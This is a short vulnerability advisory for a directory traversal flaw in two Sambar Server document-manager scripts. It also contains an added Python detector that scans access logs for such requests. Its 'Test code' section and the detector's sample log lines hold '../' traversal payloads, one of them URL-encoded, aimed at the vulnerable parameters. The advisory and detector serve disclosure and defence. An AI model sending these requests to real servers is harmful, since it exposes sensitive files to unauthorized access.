
Sambar Server Remote File Disclosure Vulnerability


Published: 2003-04-10
Updated: 2003-04-10
Severity:
Threat level: Remote unauthorized file access
Error type: Input validation error
Exploitation method: Server mode

BUGTRAQ ID:7208

Affected systems
Sambar Server 5.1                                    
   -Microsoft Windows 2000 Advanced Server          
   -Microsoft Windows 2000 Advanced Server SP1      
   -Microsoft Windows 2000 Advanced Server SP2      
   -Microsoft Windows 2000 Datacenter Server        
   -Microsoft Windows 2000 Datacenter Server SP1    
   -Microsoft Windows 2000 Datacenter Server SP2    
   -Microsoft Windows 2000 Professional              
   -Microsoft Windows 2000 Professional SP1          
   -Microsoft Windows 2000 Professional SP2          
   -Microsoft Windows 2000 Server                    
   -Microsoft Windows 2000 Server SP1                
   -Microsoft Windows 2000 Server SP2                
   -Microsoft Windows 95                            
   -Microsoft Windows 98                            
   -Microsoft Windows 98SE                          
   -Microsoft Windows ME                            
   -Microsoft Windows NT Enterprise Server 4.0      
   -Microsoft Windows NT Enterprise Server 4.0 SP1  
   -Microsoft Windows NT Enterprise Server 4.0 SP2  
   -Microsoft Windows NT Enterprise Server 4.0 SP3  
   -Microsoft Windows NT Enterprise Server 4.0 SP4  
   -Microsoft Windows NT Enterprise Server 4.0 SP5  
   -Microsoft Windows NT Enterprise Server 4.0 SP6  
   -Microsoft Windows NT Enterprise Server 4.0 SP6a  
   -Microsoft Windows NT Server 4.0                  
   -Microsoft Windows NT Server 4.0 SP1              
   -Microsoft Windows NT Server 4.0 SP2              
   -Microsoft Windows NT Server 4.0 SP3              
   -Microsoft Windows NT Server 4.0 SP4              
   -Microsoft Windows NT Server 4.0 SP5              
   -Microsoft Windows NT Server 4.0 SP6              
   -Microsoft Windows NT Server 4.0 SP6a            
   -Microsoft Windows NT Workstation 4.0            
   -Microsoft Windows NT Workstation 4.0 SP1        
   -Microsoft Windows NT Workstation 4.0 SP2        
   -Microsoft Windows NT Workstation 4.0 SP3        
   -Microsoft Windows NT Workstation 4.0 SP4        
   -Microsoft Windows NT Workstation 4.0 SP5        
   -Microsoft Windows NT Workstation 4.0 SP6        
   -Microsoft Windows NT Workstation 4.0 SP6a        
Sambar Server 5.2 b                                  
   -Microsoft Windows 2000 Advanced Server          
   -Microsoft Windows 2000 Advanced Server SP1      
   -Microsoft Windows 2000 Advanced Server SP2      
   -Microsoft Windows 2000 Datacenter Server        
   -Microsoft Windows 2000 Datacenter Server SP1    
   -Microsoft Windows 2000 Datacenter Server SP2    
   -Microsoft Windows 2000 Professional              
   -Microsoft Windows 2000 Professional SP1          
   -Microsoft Windows 2000 Professional SP2          
   -Microsoft Windows 2000 Server                    
   -Microsoft Windows 2000 Server SP1                
   -Microsoft Windows 2000 Server SP2                
   -Microsoft Windows 95                            
   -Microsoft Windows 98                            
   -Microsoft Windows 98SE                          
   -Microsoft Windows ME                            
   -Microsoft Windows NT Enterprise Server 4.0      
   -Microsoft Windows NT Enterprise Server 4.0 SP1  
   -Microsoft Windows NT Enterprise Server 4.0 SP2  
   -Microsoft Windows NT Enterprise Server 4.0 SP3  
   -Microsoft Windows NT Enterprise Server 4.0 SP4  
   -Microsoft Windows NT Enterprise Server 4.0 SP5  
   -Microsoft Windows NT Enterprise Server 4.0 SP6  
   -Microsoft Windows NT Enterprise Server 4.0 SP6a  
   -Microsoft Windows NT Server 4.0                  
   -Microsoft Windows NT Server 4.0 SP1              
   -Microsoft Windows NT Server 4.0 SP2              
   -Microsoft Windows NT Server 4.0 SP3              
   -Microsoft Windows NT Server 4.0 SP4              
   -Microsoft Windows NT Server 4.0 SP5              
   -Microsoft Windows NT Server 4.0 SP6              
   -Microsoft Windows NT Server 4.0 SP6a            
   -Microsoft Windows NT Workstation 4.0            
   -Microsoft Windows NT Workstation 4.0 SP1        
   -Microsoft Windows NT Workstation 4.0 SP2        
   -Microsoft Windows NT Workstation 4.0 SP3        
   -Microsoft Windows NT Workstation 4.0 SP4        
   -Microsoft Windows NT Workstation 4.0 SP5        
   -Microsoft Windows NT Workstation 4.0 SP6        
   -Microsoft Windows NT Workstation 4.0 SP6a        
Sambar Server 5.2                                    
Sambar Server 5.3 b4
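Description
The Sambar Server scripts iecreate.stm and ieedit.stm do not properly validate URL requests. Embedding the string "../" in a request causes directory traversal on the server side, which may allow a remote intruder to obtain the contents of certain sensitive files.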

Test code
http://[target]/sysuser/docmgr/iecreate.stm?template=../

http://[target]/sysuser/docmgr/ieedit.stm?url=../

Solution
The vendor has not yet provided a solution.
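
With no vendor fix listed, one way to spot requests of the kind described above in web server access logs. This is an added example, not part of the original advisory or of Sambar Server; the Common Log Format layout, the function names and the sample log lines are assumptions constructed for illustration, and the percent-decoding step goes slightly beyond the literal "../" string so that encoded forms of the same value are not missed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Scripts and the query parameter each one mishandles, as named in the advisory.
WATCHED = {
    "/sysuser/docmgr/iecreate.stm": "template",
    "/sysuser/docmgr/ieedit.stm": "url",
}
# Assumption: the access log uses Common Log Format.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (\S+)')

def has_parent_segment(value, max_rounds=3):
    """True if value contains a '..' path segment after normalisation."""
    for _ in range(max_rounds):              # undo nested percent-encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    # Treat backslash as a separator too, since the affected hosts run Windows.
    return ".." in value.replace("\\", "/").split("/")

def find_traversal_requests(lines):
    """Return (client, path, parameter) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue                         # not a request line we understand
        client, target = m.groups()
        parts = urlsplit(target)
        path = unquote(parts.path).lower()   # Windows paths are case-insensitive
        param = WATCHED.get(path)
        if param is None:
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name.lower() == param and has_parent_segment(value):
                hits.append((client, path, param))
                break
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Apr/2003:10:00:01 +0000] "GET /sysuser/docmgr/iecreate.stm?template=../ HTTP/1.0" 200 512',
    '192.0.2.11 - - [10/Apr/2003:10:00:05 +0000] "GET /sysuser/docmgr/ieedit.stm?url=%2e%2e%2f HTTP/1.0" 200 512',
    '192.0.2.12 - - [10/Apr/2003:10:00:09 +0000] "GET /sysuser/docmgr/ieedit.stm?url=/docs/readme.htm HTTP/1.0" 200 900',
    '192.0.2.13 - - [10/Apr/2003:10:00:12 +0000] "GET /index.htm?template=../ HTTP/1.0" 200 300',
]
```

Matching on whole path segments rather than the substring ".." keeps ordinary file names containing two dots from being flagged.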

Related information
Gregory Le Bras <gregory.lebras@security-corporation.com>

Multiple vulnerabilities in Sambar Server
http://www.security-corporation.com/index.php?id=advisories&a=012-FR